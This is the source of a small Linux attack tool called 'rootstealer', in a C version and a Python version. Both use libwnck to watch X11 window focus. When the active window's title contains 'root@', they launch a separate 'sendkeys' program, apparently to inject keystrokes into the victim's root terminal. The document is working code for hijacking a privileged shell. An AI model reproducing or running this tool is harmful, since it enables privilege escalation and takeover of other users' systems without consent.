File: rootstealer.c
/*
$sudo apt-get install libwnck-dev
$ gcc -o roostealer rootstealer.c `pkg-config --cflags --libs libwnck-1.0` -DWNCK_I_KNOW_THIS_IS_UNSTABLE -DWNCK_COMPILATION
./rootstealer


*/
#include <libwnck/libwnck.h>
#include <stdlib.h>
#include <string.h>


static void detect_root_term (WnckScreen *screen, WnckWindow *previously_active_window, gpointer    data)
{
  WnckWindow *active_window;

  active_window = wnck_screen_get_active_window (screen);

  if (active_window)
  {
	char *title=(char *)wnck_window_get_name (active_window);
	if(strstr(title,"root@"))
	{
        	char cwd[1024];
		memset(cwd,0,1024);
        	getcwd(cwd, sizeof(cwd));
		char cmd[1048];
		memset(cmd,0,1048);
		snprintf(cmd,1048,"%s%s",cwd,"/sendkeys/bin/sendkeys");
		system(cmd); // external call because have dragons in libxtst
//if  you nd debug     		
//		g_print ("active: %s\n", title);
	}
  } 
}

int main (int argc, char **argv)
{
  GMainLoop *loop;
  WnckScreen *screen;

  gdk_init (&argc, &argv);

  loop = g_main_loop_new (NULL, FALSE);
  screen = wnck_screen_get_default ();

  g_signal_connect (screen, "active-window-changed", G_CALLBACK (detect_root_term), NULL);

  g_main_loop_run (loop);

  g_main_loop_unref (loop);

  return 0;
}

File: rootstealer.py
#!/usr/bin/python
import os
import gi
gi.require_version('Wnck', '3.0') 
from gi.repository import Wnck
from gi.repository import GObject

def changed (screen, window, data):
    if window:
     test_title=window.get_name()
# for debug,remove  comments
#     print test_title+"\n"
     if test_title.find("root@") > 0:
#       print ("Root in terminal window detected")
# call external program to make CMD with X11
       os.system("./sendkeys/bin/sendkeys")


screen = Wnck.Screen.get_default ()
screen.connect ("active-window-changed", changed, None)

mainLoop = GObject.MainLoop ()

try:
    mainLoop.run ()
except KeyboardInterrupt:
    print ("error")

mainLoop.unref ()
